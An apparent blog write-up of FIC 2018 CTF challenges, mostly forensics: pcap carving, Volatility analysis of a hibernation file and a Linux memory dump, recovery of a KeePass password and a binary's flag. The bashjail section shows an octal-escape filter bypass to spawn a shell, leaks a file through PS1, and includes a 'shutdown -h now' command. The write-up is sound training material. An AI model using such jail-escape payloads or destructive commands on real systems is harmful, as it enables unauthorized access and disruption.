1 Introduction
Several security challenges have taken place during the FIC 2018 event.
Thanks to all organizers, authors and sponsors related to there challenges.
Here are some several write-ups of night and second day CTFs, mostly forensic.
2 Forensic – 50
We get a pcap file : Extract.pcapng.
I fire up wireshark, and due to the name of file, I launch foremost on it too.
------------------------------------------------------------------ File: Extract.pcapng Start: Tue Jan 23 21:28:18 2018 Length: 1 MB (1900172 bytes)Num Name (bs=512) Size File Offset Comment
0: 00003505.png 48 KB 1795007 (736 x 658)
Finish: Tue Jan 23 21:28:19 20181 FILES EXTRACTED
png:= 1
------------------------------------------------------------------
The flag is on this png file :
So I close wireshark…
3 bashjail – 100
This one was not solved by me, but I love the technique to display the flag 
We were faced to a bash jail challenge type.
Here is the output :
$ ssh [email protected] -p 2222 [email protected]'s password: Essayez de lire le fichier flag.txt :DEt voici un partie du code dans lequel vous etes :
while :
do
echo “Votre payload :”
read input
if sanitize “$input”
then
echo -e ‘\033[0;31mHop, hop, hop ! Certains caractères sont interdits\033[0m’
else
output=/bin/sh -c "$input"
fi
done
Votre payload :
A couple of week ago, the CCC Junior CTF has proposed a similar challenge:
https://ctftime.org/task/5155
We use the octal representation technique to spawn a bash shell :
Votre payload : $'\\142'$'\\141'$'\\163'$'\\150' bash-4.4# ls bash-4.4# id bash-4.4# pwd
But unfortunately, we haven’t the echo return of our commands. We began to think about sending a reverse shell, when one of team find this quick solution :
bash-4.4# export PS1=$(cat flag.txt)
ENSIBS{b45H_0utPu7_4re_fUn!!}
Pretty efficient, and as bonus :
ENSIBS{b45H_0utPu7_4re_fUn!!}export PS1=$(whoami)
root
rootshutdown -h now
4 forensic – 150
We got an hiberfil.sys for this one, with a comment like “I wrote the password in file but forget to save it”.
Volatility works with hiberfil but for performance issue, it’s better to copy it with imagecopy module :
# vol -f hiberfil.sys --profile=Win7SP0x64 imagecopy -O hiberfil.raw
After that we begin to look it with classical modules like pstree, filescan, clipboard, etc.
The first hit was found with screenshot module :
# vol -f hiberfil.raw --profile=Win7SP0x64 screenshot
Where we see this :
The user wrote down in notepad, but the title of notepad shows than he/she didn’t save it.
After few other tests, we found this module I’ve never used before:
# vol --info | grep editbox Volatility Foundation Volatility Framework 2.6 editbox - Displays information about Edit controls. (Listbox experimental.)
# vol -f hiberfil.raw --profile=Win7SP0x64 editbox Volatility Foundation Volatility Framework 2.6 ****************************** Wnd Context : 1\WinSta0\Default Process ID : 1288 ImageFileName : notepad.exe IsWow64 : No atom_class : 6.0.7600.16385!Edit value-of WndExtra : 0x212800 nChars : 56 selStart : 56 selEnd : 56 isPwdControl : False undoPos : 52 undoLen : 2 address-of undoBuf: 0x219bc0 undoBuf : Mà ------------------------- /!\ Password for 192.168.25.18:I_H4te_Hib3rnate_m0de
5 Forensic – 250
We’ve got a file USB_Partition.img, with description like “We extracted this usb key from a bad guy, but we encountered space issues during the extraction “.
$ file USB_Partition.img USB_Partition.img: DOS/MBR boot sector, code offset 0x58+2, OEM-ID "mkfs.fat", Media descriptor 0xf8, sectors/track 62, heads 125, hidden sectors 2048, sectors 102400 (volumes > 32 MB) , FAT (32 bit), sectors/FAT 788, serial number 0x8a252437, label: " "
Because of description, I firstly run testdisk on it and find, then undelete, a file memo.kdbx.
It’s a Keepass password database, and we need a password or key file to open it.
There were a lot of "noises" in this USB extract : $ mkdir mnt $ sudo mount USB_Partition.img mnt $ cd mnt $ ls -larhtdrwxr-xr-x 2 root root 512 Mar 21 2017 Cliches
drwxr-xr-x 2 root root 13K Mar 21 2017 flags
drwxr-xr-x 4 root root 1.0K Mar 21 2017 CrackMapExec-master
drwxr-xr-x 5 root root 2.5K Mar 21 2017 peepdf-master
-rwxr-xr-x 1 root root 5.9M Mar 21 2017 Guide_securite_industrielle_Version_finale.pdf
-rwxr-xr-x 1 root root 264K Mar 21 2017 ANSSI-CSPN-CER-I-02_Criteres_pour_evaluation_en_vue_d_une_CSPN_v1-1.pdf
-rwxr-xr-x 1 root root 1.4M Mar 21 2017 anssi-cspn-2016_10.pdf
-rwxr-xr-x 1 root root 760K Mar 22 2017 Template_Document.docx
_ The directory “flags” content a lot countries flags pictures
_ peepdf tools sources are in it too, and pdfextract tools highlight than one pdf appear weird
_ There is also another tool named CrackMapExec, but I don’t look deeper on it
However, I suspect the file Template_Document.docx to be interesting because of date/time modification. Indeed, all files has the same timestamp except this one :
For all files :
Modify: 2017-03-21 23:28:12.000000000 +0100 Change: 2017-03-21 23:28:12.000000000 +0100
For Template_Document.docx :
Modify: 2017-03-22 00:02:28.000000000 +0100 Change: 2017-03-22 00:03:49.000000000 +0100
It seems the author modified this file at the end to be compliant with the rest of challenge, or something… maybe to put a password on it?
After unzipping the docx, a file named “help.png” appears in ‘word’ folder instead of ‘media’. It was a qrcode.
# zbarimg help.png QR-Code:GipsyDangerRektsYou scanned 1 barcode symbols from 1 images in 0.02 seconds
It’s also the password for the keepass database file recovered at the beginning.
6 Forensic – ???
I don’t know the number of points rewarded by this one.
This challenge takes place during the second day of FIC event.
We’ve got a PNG file, with the simple description “All is in RAM”.
# file Acissi_2k18.png Acissi_2k18.png: PNG image data, 340 x 50, 8-bit/color RGBA, non-interlaced
# du -h Acissi_2k18.png 303M Acissi_2k18.png
# binwalk Acissi_2k18.pngDECIMAL HEXADECIMAL DESCRIPTION
0 0x0 PNG image, 340 x 50, 8-bit/color RGBA, non-interlaced
152 0x98 Zlib compressed data, best compression, uncompressed size >= 68121
21710 0x54CE Zip archive data, at least v2.0 to extract, compressed size: 316783029, uncompressed size: 1090610472, name: “locky.raw”
316804833 0x12E20EE1 End of Zip archive
Ok there is a zip file after the png.
# dd if=Acissi_2k18.png of=locky.zip bs=21710 skip=1 14591+1 records in 14591+1 records out 316783145 bytes (317 MB) copied, 5.90328 s, 53.7 MB/s
# 7z x locky.zip7-Zip [64] 9.20 Copyright © 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,2 CPUs)Processing archive: locky.zip
Extracting locky.raw
Everything is Ok
Size: 1090610472
Compressed: 316783145
# file locky.raw locky.raw: ELF 64-bit LSB core file x86-64, version 1 (SYSV)
# strings locky.raw | grep BOOT_IMAGE a07e8 file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash -- BOOT_IMAGE=/casper/vmlinuz 1ec3a98 Command line: file=/cdrom/preseed/custom.seed boot=casper initrd=/casper/initrd.gz quiet splash -- BOOT_IMAGE=/casper/vmlinuz ...
It appears to be a linux memory dump and after googling ‘/casper/vmlinuz’, it seems to be a live iso boot of Ubuntu distribution.
After few tests with another member of the team, he eventually finds that the good profile is available on github project page of volatility :
https://github.com/volatilityfoundation/profiles/blob/master/Linux/Ubuntu/x64/Ubuntu1404.zip
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_banner Volatility Foundation Volatility Framework 2.6 Linux version 3.16.0-28-generic (buildd@batsu) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #38-Ubuntu SMP Sat Dec 13 16:13:28 UTC 2014 (Ubuntu 3.16.0-28.38~14.04.1-generic 3.16.7-ckt1)
Work fine, let’s play.
There are a lot of “noises” in this dump, like bash history for example :
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_bash | wc -l Volatility Foundation Volatility Framework 2.6 322
But at the end we find something suspicious
... 3660 bash 2017-01-12 08:58:01 UTC+0000 ./init_ 3660 bash 2017-01-12 08:58:05 UTC+0000 sudo ./init_ 3660 bash 2017-01-12 08:58:26 UTC+0000 sudo su 3660 bash 2017-01-12 08:58:55 UTC+0000 sudo chmod 777 init_ 3660 bash 2017-01-12 08:58:58 UTC+0000 ./init_
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_getcwd | grep init_ Volatility Foundation Volatility Framework 2.6 init_ 3704 /home/cyborg/Downloads
Let’s try to recover this file:
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_find_file -f /home/cyborg/Downloads/init_ -D . Volatility Foundation Volatility Framework 2.6 ERROR : volatility.debug : The requested file doesn't exist
It fails but extracting the process works better.
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_pstree [...] ....gnome-terminal 3651 1000 .....gnome-pty-helpe 3659 1000 .....bash 3660 1000 ......init_ 3704 1000 [...]
# vol.py -f locky.raw --profile=Linuxubuntu14x64 linux_procdump -D . -p 3704 Volatility Foundation Volatility Framework 2.6 Offset Name Pid Address Output File ------------------ -------------------- --------------- ------------------ ----------- 0xffff880005783d20 init_ 3704 0x0000000008048000 ./init_.3704.0x8048000
# file init_.3704.0x8048000 init_.3704.0x8048000: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, stripped
After a quick look on it, we find this string generation :
| 0x0804848e c7442408000. mov dword [esp+0x8], 0x0 | 0x08048496 c7442404000. mov dword [esp+0x4], 0x0 | 0x0804849e c744240f2a4. mov dword [esp+0xf], 0x616c462a | 0x080484a6 c74424135f6. mov dword [esp+0x13], 0x633d675f | 0x080484ae c7442417644. mov dword [esp+0x17], 0x24314064 | 0x080484b6 c744241b695. mov dword [esp+0x1b], 0x35725f69 | 0x080484be c744241f5e6. mov dword [esp+0x1f], 0x6735685e | 0x080484c6 c7442423646. mov dword [esp+0x23], 0x6e766d64 | 0x080484ce c7442427363. mov dword [esp+0x27], 0x2a353a36 | 0x080484d6 c644242b00 mov byte [esp+0x2b], 0x0
This stands for: *Fla_g=cd@1$i_r5^h5gdmvn6:5*
But cd@1$i_r5^h5gdmvn6:5 doesn’t valid the challenge!
Nothing on description talks about a possible flag format.
I spend an hour on it.
The binary isn’t very complicated, but doesn’t appear to do something on this string. I think I missed something in dump, but nothing relevant…
Eventually I submit the complete string with “*” and “Fla_g=”, and that it.
GG me to lost one hour on 3:30 hours CTF long.
Article Link: https://www.cert-devoteam.fr/publications/en/fic-2018-random-forensics-challenges-write-up/